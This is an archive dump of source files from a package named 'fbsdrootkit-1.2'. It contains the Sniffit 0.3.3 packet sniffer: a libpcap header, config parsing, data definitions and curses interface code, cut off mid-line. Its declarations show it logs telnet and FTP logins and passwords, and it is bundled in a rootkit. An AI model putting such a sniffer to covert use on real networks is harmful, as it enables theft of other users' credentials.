Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap.h,v 1.15 94/06/14 20:03:34 leres Exp $ (LBL) */ #ifndef lib_pcap_h #define lib_pcap_h #include #include #include #include #define PCAP_VERSION_MAJOR 2 #define PCAP_VERSION_MINOR 4 #define PCAP_ERRBUF_SIZE 256 /* * Compatibility for systems that have a bpf.h that * predates the bpf typedefs for 64-bit support. */ #if BPF_RELEASE - 0 < 199406 typedef long bpf_int32; typedef u_long bpf_u_int32; #endif typedef struct pcap pcap_t; typedef struct pcap_dumper pcap_dumper_t; /* * The first record in the file contains saved values for some * of the flags used in the printout phases of tcpdump. * Many fields here are longs so compilers won't insert unwanted * padding; these files need to be interchangeable across architectures. */ struct pcap_file_header { bpf_u_int32 magic; u_short version_major; u_short version_minor; bpf_int32 thiszone; /* gmt to local correction */ bpf_u_int32 sigfigs; /* accuracy of timestamps */ bpf_u_int32 snaplen; /* max length saved portion of each pkt */ bpf_u_int32 linktype; /* data link type (DLT_*) */ }; /* * Each packet in the dump file is prepended with this generic header. * This gets around the problem of different headers for different * packet interfaces. */ struct pcap_pkthdr { struct timeval ts; /* time stamp */ bpf_u_int32 caplen; /* length of portion present */ bpf_u_int32 len; /* length this packet (off wire) */ }; /* * As returned by the pcap_stats() */ struct pcap_stat { u_int ps_recv; /* number of packets received */ u_int ps_drop; /* number of packets dropped */ u_int ps_ifdrop; /* drops by interface XXX not yet supported */ }; typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *, const u_char *); char *pcap_lookupdev(char *); int pcap_lookupnet(char *, u_long *, u_long *, char *); pcap_t *pcap_open_live(char *, int, int, int, char *); pcap_t *pcap_open_offline(char *, char *); void pcap_close(pcap_t *); int pcap_loop(pcap_t *, int, pcap_handler, u_char *); int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *); const u_char* pcap_next(pcap_t *, struct pcap_pkthdr *); int pcap_stats(pcap_t *, struct pcap_stat *); int pcap_setfilter(pcap_t *, struct bpf_program *); void pcap_perror(pcap_t *, char *); char *pcap_strerror(int); char *pcap_geterr(pcap_t *); int pcap_compile(pcap_t *, struct bpf_program *, char *, int, u_long); /* XXX */ int pcap_freecode(pcap_t *, struct bpf_program *); int pcap_datalink(pcap_t *); int pcap_snapshot(pcap_t *); int pcap_is_swapped(pcap_t *); int pcap_major_version(pcap_t *); int pcap_minor_version(pcap_t *); /* XXX */ FILE *pcap_file(pcap_t *); int pcap_fileno(pcap_t *); pcap_dumper_t *pcap_dump_open(pcap_t *, char *); void pcap_dump_close(pcap_dumper_t *); void pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *); /* XXX this guy lives in the bpf tree */ u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); char *bpf_image(struct bpf_insn *, int); #endif fbsdrootkit-1.2/sniffit.0.3.3/sample_config_file100600 764 764 352 6226213211 16740 0ustar dfdf# Sniffit V.0.3.3 Sample Config file -- Brecht Claerhout # First select all packets! select both mhosts 1 select both mhosts 2 # Now deselect all packets from/to those damn 'surfers' deselect both port 80 deselect both port 8001 fbsdrootkit-1.2/sniffit.0.3.3/sn_cfgfile.h100600 764 764 25026 6226213211 15525 0ustar dfdfvoid clear_list_buffer (struct cfg_file_contense *help) { help->host[0]=0; help->priority=0; help->port=0; help->wildcard=0; } struct cfg_file_contense *adjust_select_from_list (void) { Priority++; select_from_length++; select_from_list=(struct cfg_file_contense *)realloc(select_from_list, select_from_length*sizeof(struct cfg_file_contense)); if(select_from_list==NULL) {printf("Sniffit hartattack... out of memory!\n"); exit(1);} clear_list_buffer(&(select_from_list[select_from_length-1])); return &(select_from_list[select_from_length-1]); } struct cfg_file_contense *adjust_select_to_list (void) { Priority++; select_to_length++; select_to_list=(struct cfg_file_contense *)realloc(select_to_list, select_to_length*sizeof(struct cfg_file_contense)); if(select_to_list==NULL) {printf("Sniffit hartattack... out of memory!\n"); exit(1);} clear_list_buffer(&(select_to_list[select_to_length-1])); return &(select_to_list[select_to_length-1]); } struct cfg_file_contense *adjust_deselect_from_list (void) { Priority++; deselect_from_length++; deselect_from_list=(struct cfg_file_contense *)realloc(deselect_from_list, deselect_from_length*sizeof(struct cfg_file_contense)); if(deselect_from_list==NULL) {printf("Sniffit hartattack... out of memory!\n"); exit(1);} clear_list_buffer(&(deselect_from_list[deselect_from_length-1])); return (&(deselect_from_list[deselect_from_length-1])); } struct cfg_file_contense *adjust_deselect_to_list (void) { Priority++; deselect_to_length++; deselect_to_list=(struct cfg_file_contense *)realloc(deselect_to_list, deselect_to_length*sizeof(struct cfg_file_contense)); if(deselect_to_list==NULL) {printf("Sniffit hartattack... out of memory!\n"); exit(1);} clear_list_buffer(&(deselect_to_list[deselect_to_length-1])); return &(deselect_to_list[deselect_to_length-1]); } char *clean_string (char *string) { char help[20]; int i, j; j=0; for(i=0;ihost,dot_notation); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* select from port */ { help=adjust_select_from_list(); help->port=atoi( strtok(NULL," ") ); help->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* select from mhosts */ { help=adjust_select_from_list(); strcpy(help->host, clean_string(strtok(NULL," "))); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; help->wildcard=1; return; } } if(strcmp(strlower(field),"to")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* select to host */ { help=adjust_select_to_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* select to port */ { help=adjust_select_to_list(); help->port=atoi( strtok(NULL," ") ); help->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* select to mhosts */ { help=adjust_select_to_list(); strcpy(help->host, clean_string(strtok(NULL," "))); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; help->wildcard=1; return; } } if(strcmp(strlower(field),"both")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* select both host */ { help=adjust_select_from_list(); helpp=adjust_select_to_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); strcpy(helpp->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) {help->port=atoi(field); helpp->port=atoi(field);} help->priority=Priority; helpp->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* select both port */ { help=adjust_select_from_list(); helpp=adjust_select_to_list(); field=strtok(NULL," "); help->port=atoi(field); helpp->port=atoi(field); help->priority=Priority; helpp->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* select both mhosts */ { help=adjust_select_from_list(); helpp=adjust_select_to_list(); field=clean_string(strtok(NULL," ")); strcpy(help->host, field); strcpy(helpp->host, field); if( (field=strtok(NULL," "))!=NULL) {help->port=atoi(field); helpp->port=atoi(field);} help->priority=Priority; helpp->priority=Priority; help->wildcard=1; helpp->wildcard=1; return; } } } if(strcmp(strlower(field),"deselect")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"from")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* select from host */ { help=adjust_deselect_from_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* select from port */ { help=adjust_deselect_from_list(); help->port=atoi(strtok(NULL," ")); help->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* select from mhosts */ { help=adjust_deselect_from_list(); strcpy(help->host, clean_string(strtok(NULL," "))); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; help->wildcard=1; return; } } if(strcmp(strlower(field),"to")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* deselect to host */ { help=adjust_deselect_to_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* deselect to port */ { help=adjust_deselect_to_list(); help->port=atoi(strtok(NULL," ")); help->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* deselect to mhosts */ { help=adjust_deselect_to_list(); strcpy(help->host, clean_string(strtok(NULL," "))); if( (field=strtok(NULL," "))!=NULL) help->port=atoi(field); help->priority=Priority; help->wildcard=1; return; } } if(strcmp(strlower(field),"both")==0) { field=strtok(NULL," "); if(strcmp(strlower(field),"host")==0) /* deselect both host */ { help=adjust_deselect_from_list(); helpp=adjust_deselect_to_list(); make_nr_dot(strtok(NULL," ")); strcpy(help->host,dot_notation); strcpy(helpp->host,dot_notation); if( (field=strtok(NULL," "))!=NULL) {help->port=atoi(field); helpp->port=atoi(field);} help->priority=Priority; helpp->priority=Priority; return; } if(strcmp(strlower(field),"port")==0) /* deselect both port */ { help=adjust_deselect_from_list(); helpp=adjust_deselect_to_list(); field=strtok(NULL," "); help->port=atoi(field); helpp->port=atoi(field); help->priority=Priority; helpp->priority=Priority; return; } if(strcmp(strlower(field),"mhosts")==0) /* deselect both mhosts */ { help=adjust_deselect_from_list(); helpp=adjust_deselect_to_list(); field=clean_string(strtok(NULL," ")); strcpy(help->host, field); strcpy(helpp->host, field); if( (field=strtok(NULL," "))!=NULL) {help->port=atoi(field); helpp->port=atoi(field);} help->priority=Priority; helpp->priority=Priority; help->wildcard=1; helpp->wildcard=1; return; } } } } } void read_cfg_file (char *file) { FILE *cfgfile; size_t line_length; char lineptr[260]; select_from_list=NULL; select_to_list=NULL; deselect_from_list=NULL; deselect_to_list=NULL; Priority=0; if((cfgfile = fopen(file,"r"))==NULL) {printf("Couldn't find config file... giving up.\n"); exit(1);} while(feof(cfgfile)==0) { fgets(lineptr,259,cfgfile); if(feof(cfgfile)==0) { interprete_line(lineptr);} } fclose(cfgfile); }; fbsdrootkit-1.2/sniffit.0.3.3/sn_data.h100600 764 764 15737 6226213211 15047 0ustar dfdf/* Sniffit Data File -- Brecht Claerhout */ /**** Handler function ******************************************************/ #ifdef INCLUDE_INTERFACE typedef void (*sig_hand)(int ); /* sighandler_t gave errors, weird */ #endif /**** Global data **********************************************************/ struct file_info { char proto, filename[50]; FILE *f; unsigned long bytes; unsigned long exp_seq; /* expected seq to avoid double logging */ int time_out; char log; /* log=0 : do nothing */ /* log=1 : log 'login' */ /* log=2 : 'login' logged */ /* log=3 : log password */ /* log=4 : password logged */ /* log=99 : no more detection */ char scroll_buf[SCBUF+1]; /* scroll buffer */ char *buffer; /* pointer to a buffer */ struct file_info *next; }; pcap_t *dev_desc; void *start_dynam; int dynam_len; char Logfile[250]; /* name of logfile */ FILE *LogFILE; /* logfile stream */ char *IP; unsigned long SNIFLEN; /* bytes we need to snif */ short DEST_PORT; /* destination port */ char non_printable, *logging_device; /**** Global data (config) **************************************************/ struct cfg_file_contense { unsigned char host[16]; unsigned int priority; unsigned char wildcard; unsigned short port; }; struct cfg_file_contense *select_from_list; /* pointers for cfg lists */ struct cfg_file_contense *select_to_list; struct cfg_file_contense *deselect_from_list; struct cfg_file_contense *deselect_to_list; int select_from_length=0; /* length of cfg lists */ int select_to_length=0; int deselect_from_length=0; int deselect_to_length=0; int Priority=0; /* The higher the priority, the more important */ char dot_notation[20]; /* for easy working, Q&D */ /**** Global data (interactive) *********************************************/ #ifdef INCLUDE_INTERFACE /**** shared memory pointers ************************************************/ char *SHARED, *connection_data, *timing, *running_connections, *logged_connections; int *LISTlength, *DATAlength, memory_id; unsigned int *TCP_nr_of_packets, *ICMP_nr_of_packets, *UDP_nr_of_packets; unsigned int *IP_nr_of_packets; unsigned long *TCP_bytes_in_packets, *UDP_bytes_in_packets; /**** data structures *******************************************************/ struct shared_conn_data /* shared memory connection datastructure */ { char connection [CONN_NAMELEN]; /* full ID string of conn */ int timeout; }; struct shared_logged_conn /* shared memory logging datastructure */ { char log_enter [CONN_NAMELEN]; /* normal logging */ }; struct snif_mask /* struct for mask */ { unsigned long source_ip, destination_ip; unsigned short source_port, destination_port; }; struct snif_mask *mask; struct shared_logged_conn *log_conn; FILE *log_dev_stream; struct stat log_dev_stat; volatile int LOGGING=0, screen_busy=0; char PACKET_INFO; int POINTpos=0, LISTpos=0; unsigned char COLOR_AVAIL=0; WINDOW *menu_window; struct box_window {WINDOW *main_window,*work_window;}; struct box_window data_box, main_box, mask_box, packets_box; int Pid=0; #endif /**** Sniffit functions *****************************************************/ int check_packet(unsigned long, const struct packetheader *, const unsigned char *, char *, char *, struct unwrap *, char *, int); pcap_handler packethandler(u_char *, const struct packetheader *, const unsigned char *); void print_iphead (struct IP_header *, char); static unsigned long getaddrbyname(char *); void quit (char *); void reset_all (void); char *strlower (char *); struct file_info *add_dynam (char *, char, char, unsigned long, int); void delete_dynam (char *, char, char); void record_buf(struct file_info *, unsigned long, char *, int, int); void sb_shift(struct file_info *); void sbuf_update(struct file_info *, unsigned long, char *, int); struct file_info *search_dynam(char *, char); void my_exit (void); /**** Sniffit functions (config) ********************************************/ void clear_list_buffer (struct cfg_file_contense *); struct cfg_file_contense *adjust_select_from_list (void); struct cfg_file_contense *adjust_select_to_list (void); struct cfg_file_contense *adjust_deselect_from_list (void); struct cfg_file_contense *adjust_deselect_to_list (void); char *clean_string (char *); char *clean_filename (char *); void make_nr_dot (char *); void interprete_line (char *); void read_cfg_file (char *); /**** Sniffit functions (logfile) *******************************************/ void logfile_exit (void); char *gettime (void); void print_logline (char *); void print_ftp_user (char *, char *); void print_ftp_pass(char *, char *); void print_login (char *, char *); void print_pwd (char *, char *); void print_conn (char *, char *); void open_logfile (void); /**** Sniffit functions (packets) *******************************************/ unsigned short in_cksum(unsigned short *,int); int unwrap_packet (const unsigned char *, struct unwrap *); /**** Interface functions ***************************************************/ #ifdef INCLUDE_INTERFACE int add_itemlist(char *, char *); void child_exit (void); void clear_shared_mem(char); void data_device (char *, int); void data_window (struct box_window *, struct box_window *, int, int, int, int, char *, int); int del_itemlist(char *, char *); void exec_mask (void); void f_box_window (struct box_window *, int, int, int, int, int); void fill_box_window (struct box_window *, char *, int, int, int); void forced_refresh (void); void init_screen (void); char *input_field(char *, char *); void interaction (int); void mask_status (struct box_window *); void mem_exit (void); void menu_line (void); void point_item (struct box_window *, char *, int, int, int, int); void run_interface (void); void screen_exit (void); void set_signal (int, sig_hand); void sig_blocking(char, int); void stop_logging (void); int check_mask (const struct packetheader *,const unsigned char *, char *, struct unwrap *); pcap_handler interactive_packethandler( char *, const struct packetheader *, const unsigned char *); void stop_packet_info (void); void packet_info_handler (int); void create_arguments(char *, char *, char *, char *, char *, int); #endif /**** DEBUG section ********************************************************/ #ifdef DEBUG FILE *debug_dev; unsigned int debug_cnt=0; void close_debug_device (void); void debug_msg(char *); #endif fbsdrootkit-1.2/sniffit.0.3.3/sn_defines.h100600 764 764 4734 6226213211 15526 0ustar dfdf/* Sniffit Defines File -- Brecht Claerhout */ #include #include #include #include #include #include #include #include #include #include "pcap.h" /* Network Devices */ #define PPP_DEV "ppp" #ifdef LINUX #define ETH_DEV "eth" #endif #ifdef SUNOS #define ETH_DEV "le" #endif #ifdef IRIX #define ETH_DEV "et" #endif #ifdef FREEBSD #define ETH_DEV "ed" #endif #ifdef BSDI #define ETH_DEV "ef" #endif #ifdef INCLUDE_INTERFACE /* If this file is reported missing, fill in the absolute path of the file */ /* ncurses.h location can vary from time to time. */ /* NOTE: this file is generaly equal to curses.h */ #include #include #include #endif /*** Normal Sniffit operations */ #define VERSION "0.3.3" /* Program Version */ #define SNAPLEN MTU /* Ethernet Packet Length */ #define MSDELAY 0 /* Delay between Packets */ #define PACKETS 1 /* Number of packets to dispatch */ #define LENGTH_OF_INTERPROC_DATA 5*SNAPLEN /* buffer capacity */ #define SCBUF 30 /* scroll buffer length */ #define LOG_PASS_BUF 20+1 /* login/pwd buffer length */ #define TELNET_ENTER 0x0d /* Enter in telnet login session */ #define FTP_ENTER 0x0d /* first char of Enter in FTP login session */ #define DEST 0 #define SOURCE 1 #define BOTH 2 #define INTERACTIVE 99 /* Packet examining defines (finish) */ /* 0-9 : TCP */ /* 10-19: ICMP */ /* 20-29: UDP */ #define DONT_EXAMINE -1 /* Skip Packet */ #define TCP_EXAMINE 0 /* TCP - 'for us' */ #define TCP_FINISH 1 /* TCP - end connection */ #define ICMP_EXAMINE 10 /* ICMP - examine */ #define UDP_EXAMINE 20 /* UDP - examine */ #define F_TCP 1 /* Flags for PROTOCOLS */ #define F_ICMP 2 #define F_UDP 4 #define F_IP 8 /*** Interface defines */ #ifdef INCLUDE_INTERFACE #define ENTER 13 #define WIN_COLOR_NORMAL 1 /* Color pairs for various functions */ #define WIN_COLOR_POINT 2 #define WIN_COLOR_DATA 3 #define WIN_COLOR_INPUT 4 #define WIN_COLOR_MENU 5 #define WIN_COLOR_PACKET_INFO 6 #define CONN_NAMELEN 56 /* length of string */ #define MENU " Masks: F1-Source IP F2-Dest. IP F3-Source Port F4-Dest. Port" #endif fbsdrootkit-1.2/sniffit.0.3.3/sn_global.h100600 764 764 521 6226213211 15317 0ustar dfdf/* Sniffit Global File -- Brecht Claerhout */ /* some things that are better defined before all the rest */ /* currently some option data */ char SNIFMODE, DUMPMODE, PROTOCOLS, ASC, WILDCARD, CFG_FILE, NO_CHKSUM; char LOGLEVEL; /* All option shit */ fbsdrootkit-1.2/sniffit.0.3.3/sn_interface.h100600 764 764 50166 6226213211 16071 0ustar dfdf/* Sniffit Interface File -- Brecht Claerhout */ /*** Screen Parameters ***/ int MASK_WINDOW_ROWS, MASK_WINDOW_COLS; int MAIN_WINDOW_ROWS, MAIN_WINDOW_COLS; int INFO_WINDOW_ROWS, INFO_WINDOW_COLS; int DATA_WINDOW_ROWS, DATA_WINDOW_COLS; int INFO_WINDOW_X, INFO_WINDOW_Y; int MASK_WINDOW_X, MASK_WINDOW_Y; int DATA_WINDOW_X, DATA_WINDOW_Y; /*** Sreen operations ***/ void init_screen (void) { initscr(); cbreak(); noecho(); nonl(); clear(); if(has_colors()!=-1) { COLOR_AVAIL=1; start_color(); init_pair(WIN_COLOR_NORMAL,COLOR_WHITE,COLOR_BLUE); init_pair(WIN_COLOR_POINT,COLOR_BLUE,COLOR_CYAN); init_pair(WIN_COLOR_DATA,COLOR_BLUE,COLOR_CYAN); init_pair(WIN_COLOR_INPUT,COLOR_BLUE,COLOR_CYAN); init_pair(WIN_COLOR_MENU,COLOR_BLUE,COLOR_CYAN); init_pair(WIN_COLOR_PACKET_INFO,COLOR_BLUE,COLOR_CYAN); } else { COLOR_AVAIL=0; } MAIN_WINDOW_ROWS = LINES-5; MAIN_WINDOW_COLS = COLS; MASK_WINDOW_ROWS = 4; MASK_WINDOW_COLS = COLS; MASK_WINDOW_X = 0; MASK_WINDOW_Y = LINES-5; INFO_WINDOW_ROWS = 8; INFO_WINDOW_COLS = 35; INFO_WINDOW_X = 3; INFO_WINDOW_Y = MAIN_WINDOW_ROWS-INFO_WINDOW_ROWS-2; DATA_WINDOW_ROWS = (MAIN_WINDOW_ROWS/3)*2; DATA_WINDOW_COLS = (MAIN_WINDOW_COLS/3)*2; DATA_WINDOW_X = COLS-DATA_WINDOW_COLS-2; DATA_WINDOW_Y = 3; exit_func(screen_exit); if( (COLS<80)||(LINES<18) ) exit(0); }; void f_box_window (struct box_window *Win, int num_lines, int num_cols, int begy,int begx, int col_mode) /* col_mode : color selection */ { int i; Win->main_window=newwin(num_lines,num_cols,begy,begx); Win->work_window=subwin(Win->main_window,num_lines-2,num_cols-2,begy+1,begx+1); if(COLOR_AVAIL) { switch(col_mode) { case 0: wattrset(Win->main_window,COLOR_PAIR(WIN_COLOR_NORMAL)); wattrset(Win->work_window,COLOR_PAIR(WIN_COLOR_NORMAL)); break; case 1: wattrset(Win->main_window,COLOR_PAIR(WIN_COLOR_PACKET_INFO)); wattrset(Win->work_window,COLOR_PAIR(WIN_COLOR_PACKET_INFO)); break; default:break; } for(i=0;i<=(num_lines-2);i++) { wmove(Win->work_window,i,0); whline(Win->work_window,' ',num_cols-2); } } keypad(Win->work_window,1); box(Win->main_window,ACS_VLINE,ACS_HLINE); mvwprintw(Win->main_window,0,3,"Sniffit %s",VERSION); wmove(Win->work_window,0,0); wnoutrefresh(Win->main_window);wnoutrefresh(Win->work_window); doupdate(); } void data_window (struct box_window *Win, struct box_window *P_Win, int num_lines, int num_cols, int begy,int begx, char *buffer, int listitem) { int i=0, j=0; struct shared_conn_data *conn; conn = (struct shared_conn_data *) buffer; while((j=CONNECTION_CAPACITY+1) return; j=0; Win->main_window=newwin(num_lines,num_cols,begy,begx); Win->work_window=subwin(Win->main_window,num_lines-5,num_cols-2,begy+1,begx+1); scrollok(Win->work_window,1); if(COLOR_AVAIL) wattrset(Win->main_window,COLOR_PAIR(WIN_COLOR_DATA)); box(Win->main_window,ACS_VLINE,ACS_HLINE); wmove(Win->main_window,num_lines-3,1); whline(Win->main_window,ACS_HLINE,num_cols-2); wmove(Win->main_window,num_lines-2,1); whline(Win->main_window,' ',num_cols-2); wmove(Win->main_window,num_lines-2,2); waddstr(Win->main_window, conn[i].connection); strcpy(log_conn->log_enter,conn[i].connection); wmove(Win->work_window,0,0); wnoutrefresh(Win->main_window);wnoutrefresh(Win->work_window); doupdate(); } void data_device (char *buffer, int listitem) { int i=0, j=0; struct shared_conn_data *conn; conn = (struct shared_conn_data *) buffer; while((j=CONNECTION_CAPACITY+1) return; strcpy(log_conn->log_enter, conn[i].connection); } void mask_status (struct box_window *Work_win) { unsigned char *ad; int i; wmove(Work_win->work_window,0,1); for(i=0;i<2;i++) {wmove(Work_win->work_window,i,0); whline(Work_win->work_window,' ',COLS-2);} wmove(Work_win->work_window,0,1); wprintw(Work_win->work_window,"Source IP : "); ad=&(mask->source_ip); if(mask->source_ip==0) wprintw(Work_win->work_window,"All"); else wprintw(Work_win->work_window,"%u.%u.%u.%u",ad[0],ad[1],ad[2],ad[3]); wmove(Work_win->work_window,1,1); wprintw(Work_win->work_window,"Destination IP: "); ad=&(mask->destination_ip); if(mask->destination_ip==0) wprintw(Work_win->work_window,"All"); else wprintw(Work_win->work_window,"%u.%u.%u.%u",ad[0],ad[1],ad[2],ad[3]); wmove(Work_win->work_window,0,35); wprintw(Work_win->work_window,"Source PORT : "); if(mask->source_port==0) wprintw(Work_win->work_window,"All"); else wprintw(Work_win->work_window,"%u",mask->source_port); wmove(Work_win->work_window,1,35); wprintw(Work_win->work_window,"Destination PORT: "); if(mask->destination_port==0) wprintw(Work_win->work_window,"All"); else wprintw(Work_win->work_window,"%u",mask->destination_port); wnoutrefresh(Work_win->main_window); wnoutrefresh(Work_win->work_window); doupdate(); } void fill_box_window (struct box_window *Work_win, char *buffer, int begin_item, int boxlen, int rowlen) /* 0 is the first item */ { int i=0, j=0, line=0; struct shared_conn_data *conn; conn = (struct shared_conn_data *) buffer; while((j=CONNECTION_CAPACITY+1) return; j=0; while((linework_window,line,0); whline(Work_win->work_window,' ',rowlen); if(strcmp(log_conn->log_enter,conn[i+j].connection) != 0) wprintw(Work_win->work_window," %s",conn[i+j].connection); else wprintw(Work_win->work_window," %s *LOGGED*", conn[i+j].connection); line++; } j++; } for(i=line;iwork_window,i,0); whline(Work_win->work_window,' ',rowlen); }; wnoutrefresh(Work_win->work_window); } void point_item (struct box_window *Work_win, char *buffer, int item, int begin_item, int boxlen, int rowlen) { int i=0, j=0; struct shared_conn_data *conn; if(item<0) return; /* POINTpos 0 = first item -1 = no items */ /* LISTlength 0 = 1 -1 = no items */ /* DANGER - there should always be >= */ /* connections than 'item' */ conn = (struct shared_conn_data *) buffer; while((j=CONNECTION_CAPACITY+1) return; j=0; #ifdef DEBUG debug_msg(conn[i].connection); #endif if(COLOR_AVAIL!=0) wattrset(Work_win->work_window,COLOR_PAIR(WIN_COLOR_POINT)); else wattron(Work_win->work_window,A_REVERSE); wmove(Work_win->work_window,item-begin_item,0); whline(Work_win->work_window,' ',rowlen); if(strcmp(log_conn->log_enter,conn[i].connection)!=0) mvwprintw(Work_win->work_window,item-begin_item,0, " %s", conn[i].connection ); else mvwprintw(Work_win->work_window,item-begin_item,0, " %s *LOGGED*", conn[i].connection ); wnoutrefresh(Work_win->work_window); if(COLOR_AVAIL!=0) wattrset(Work_win->work_window,COLOR_PAIR(WIN_COLOR_NORMAL)); else wattroff(Work_win->work_window,A_REVERSE); } void forced_refresh (void) { #ifdef DEBUG char debug_line[200]; #endif if((POINTpos<0)&&(*LISTlength>=0)) POINTpos=0; if((POINTpos>*LISTlength)&&(*LISTlength>=0)) POINTpos=*LISTlength; if((POINTpos>*LISTlength)&&(*LISTlength<0)) POINTpos=-1; while(screen_busy!=0) {}; /* wait till screen operations stop */ #ifdef DEBUG sprintf(debug_line,"FIX: POINTpos: %d LISTlength: %d LISTpos: %d\n",POINTpos,*LISTlength,LISTpos); debug_msg(debug_line); #endif fill_box_window(&main_box, running_connections,LISTpos, MAIN_WINDOW_ROWS-2,MAIN_WINDOW_COLS-2); point_item(&main_box, running_connections, POINTpos,LISTpos, MAIN_WINDOW_ROWS-2,MAIN_WINDOW_COLS-2); if((LOGGING==1)&&(logging_device==NULL)) { touchwin(data_box.main_window);touchwin(data_box.work_window); wnoutrefresh(data_box.main_window);wnoutrefresh(data_box.work_window); } if(PACKET_INFO==1) { touchwin(packets_box.main_window);touchwin(packets_box.work_window); wnoutrefresh(packets_box.main_window); wnoutrefresh(packets_box.work_window); } doupdate(); } void menu_line (void) { int i; if(menu_window==NULL) menu_window=newwin (1,COLS,LINES-1,0); if(COLOR_AVAIL!=0) { wattrset(menu_window,COLOR_PAIR(WIN_COLOR_MENU)); wmove(menu_window,0,0); whline(menu_window,' ',COLS); } mvwaddstr(menu_window,0,0,MENU); wnoutrefresh(menu_window); } char *input_field(char *string, char *input) { int i; WINDOW *Work_txt, *Work_inp; #ifdef DEBUG debug_msg("IntAct: Input Field activated"); #endif Work_txt=newwin(1,COLS,LINES-1,0); Work_inp=newwin(1,50,LINES-1,strlen(string)); if(COLOR_AVAIL!=0) { wattrset(Work_inp,COLOR_PAIR(WIN_COLOR_INPUT)); wattrset(Work_txt,COLOR_PAIR(WIN_COLOR_NORMAL)); whline(Work_txt,' ',COLS); whline(Work_inp,' ',50); } mvwaddstr(Work_txt,0,0,string); while(screen_busy!=0) {}; wnoutrefresh(Work_txt);wnoutrefresh(Work_inp); doupdate(); echo();mvwgetstr(Work_inp,0,0,input);noecho(); delwin(Work_inp);delwin(Work_txt); menu_line(); forced_refresh(); return input; } void exec_mask (void) { LISTpos=0; POINTpos=-1; /* otherwise we get never ending loop */ clear_shared_mem(1); mask_status(&mask_box); if(LOGGING==1) stop_logging(); forced_refresh(); } /* signaling */ void sig_blocking(char on_off, int sig) { sigset_t set; sigemptyset(&set);sigaddset(&set,sig); if(on_off==1) {sigprocmask(SIG_BLOCK,&set,NULL);} else {sigprocmask(SIG_UNBLOCK,&set,NULL);} } void set_signal (int signum, sig_hand new_action) { struct sigaction new_sigusr; sigset_t sig_mask; sigemptyset(&sig_mask); sigaddset(&sig_mask,SIGUSR1); sigaddset(&sig_mask,SIGALRM); new_sigusr.sa_handler=new_action; new_sigusr.sa_mask=sig_mask; new_sigusr.sa_flags=0; sigaction(signum,&new_sigusr,NULL); } void interaction (int sig) /* invoked when data arrives */ { int i; struct shared_conn_data *conn; /* timeout increase */ conn = (struct shared_conn_data *) running_connections; for(i=0;ilog_enter[0]==0)) stop_logging(); screen_busy=1; if((LOGGING==1)&&(*DATAlength!=0)) { if(logging_device==NULL) { for(i=0;i<*DATAlength;i++) waddch(data_box.work_window, isprint(*(connection_data+i))? *(connection_data+i):'.'); } else { for(i=0;i<*DATAlength;i++) fputc(*(connection_data+i),log_dev_stream); fflush(log_dev_stream); } *DATAlength=0; } screen_busy=0; forced_refresh(); set_signal(SIGUSR1,interaction); } void packet_info_handler (int signum) { #ifdef DEBUG debug_msg("ALARM RANG"); #endif screen_busy=1; mvwprintw(packets_box.work_window,0,1,"IP packets/sec. : % 12u",(*IP_nr_of_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,1,1,"TCP packets/sec. : % 12u",(*TCP_nr_of_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,2,1,"ICMP packets/sec.: % 12u",(*ICMP_nr_of_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,3,1,"UDP packets/sec. : % 12u",(*UDP_nr_of_packets)/INFO_TIMER); mvwprintw(packets_box.work_window,4,1,"bytes/sec. (TCP) : % 